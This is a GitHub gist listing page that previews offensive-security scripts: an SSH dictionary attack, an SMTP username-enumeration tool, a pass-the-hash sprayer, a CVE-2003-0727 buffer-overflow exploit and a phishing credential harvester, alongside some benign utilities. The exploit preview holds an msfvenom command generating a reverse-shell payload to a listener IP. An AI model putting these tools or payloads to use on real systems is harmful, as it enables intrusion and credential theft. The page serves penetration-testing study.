securitytube
/ SSHDictionaryAttack.py
Created
April 4, 2013 06:24
SSH Dictionary Attack using Usernames and Password Lists
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| """ | |
| Author: Vivek Ramachandran | |
| Website: http://SecurityTube.net | |
| Online Infosec Training: http://SecurityTube-Training.com | |
| """ | |
| import paramiko |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| """ | |
| Author: Vivek Ramachandran | |
| Website: http://SecurityTube.net | |
| Online Infosec Training: http://SecurityTube-Training.com | |
| """ | |
| import paramiko |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import sys | |
| import netaddr | |
| import logging | |
| logging.getLogger("scapy.runtime").setLevel(logging.ERROR) | |
| from scapy.all import sr1, IP, ICMP | |
| PING_TIMEOUT = 3 | |
| IFACE='eth0' |
mgeeky
/ smtpvrfy.py
Last active
April 4, 2023 06:09
SMTP VRFY python tool intended to check whether SMTP server is leaking usernames.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # | |
| # Simple script intended to abuse SMTP server's VRFY command to leak | |
| # usernames having accounts registered within it. | |
| # | |
| # Mariusz B., 2016 | |
| # | |
| import socket | |
| import sys |
mgeeky
/ nmap-grep-to-table.sh
Created
August 27, 2016 22:42
Script converting nmap's greppable output (-oG) into a printable per-host tables.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # | |
| # Simple script converting nmap's greppable output into a | |
| # printable per-host table with protocol, port, state and service | |
| # columns in it. | |
| # | |
| # | |
| # WARNING: |
mgeeky
/ pth-carpet.py
Last active
December 6, 2016 04:22
Pass-The-Hash Carpet Bombing utility - trying every provided hash against every specified machine.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # | |
| # Simple script intended to perform Carpet Bombing against list | |
| # of provided machines using list of provided LSA Hashes (LM:NTLM). | |
| # The basic idea with Pass-The-Hash attack is to get One hash and use it | |
| # against One machine. There is a problem with this approach of not having information, | |
| # onto what machine we could have applied the hash. | |
| # To combat this issue - the below script was born. | |
| # |
mgeeky
/ exp2003-0727.py
Last active
August 1, 2018 00:40
CVE-2003-0727 Oracle 9i XDB HTTP Server Authentication PASS stack-based buffer overflow
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import struct | |
| import socket | |
| import base64 | |
| import time | |
| HOST = '192.168.0.11:8080' | |
| # | |
| # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=4448 -e x86/shikata_ga_nai --smallest -f py -v shellcode |
mgeeky
/ webapplication-heartbeat.sh
Last active
July 24, 2022 20:17
WebApplication heartbeat script intended to poll remote web application whether it responds correctly (HTTP 200 OK) or not - thus resulting in Linux GNOME alert being generated. Useful when dealing with unstable webservers or appications behind VPN connection.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # | |
| # Simple script intended to poll remote web application to check whether it is available | |
| # and returns 200 OK. If it is not, then Linux GNOME-related alert will be generated. | |
| # | |
| # Mariusz B., 2016 | |
| # | |
| REMOTE_HOST="http://<webapplication>" |
mgeeky
/ post.php
Last active
December 27, 2023 07:40
(GIST discontinued, for recent version check: https://github.com/mgeeky/PhishingPost ) PHP Credentials Harversting script to be used during Social Engineering Phishing campaigns/projects.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /* | |
| * PHP Script intdended to be used during Phishing attempts as a harverster | |
| * collector linked to backdoored HTML <form> action parameter. Such action | |
| * parameter could be set like this: | |
| * | |
| * <form [...] action="/post.php" [...]> | |
| * | |
| * and script named as 'post.php' to get it working. Additional further configurations | |
| * can be made in the section below. |
mgeeky
/ memory-occupied-by-process.sh
Last active
December 6, 2016 04:22
Bash oneliner counting number of bytes occupied by chosen (by PID) process. It works by iterating /proc/$PID/maps file, then computing each memory region range size, then adding it together. Kinda slow though.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| PID=<PID>; BYTES=`IFS=$'\n'; for l in $(cat /proc/$PID/maps | cut -d' ' -f1 | awk -F '-' '{printf "0x%s-0x%s\n", $2, $1}'); do echo $l | ruby -e 'print "#{eval(STDIN.read)}\n"'; done | paste -sd+ - | bc`; echo "Bytes occupied by PID=$PID : $BYTES" |
OlderNewer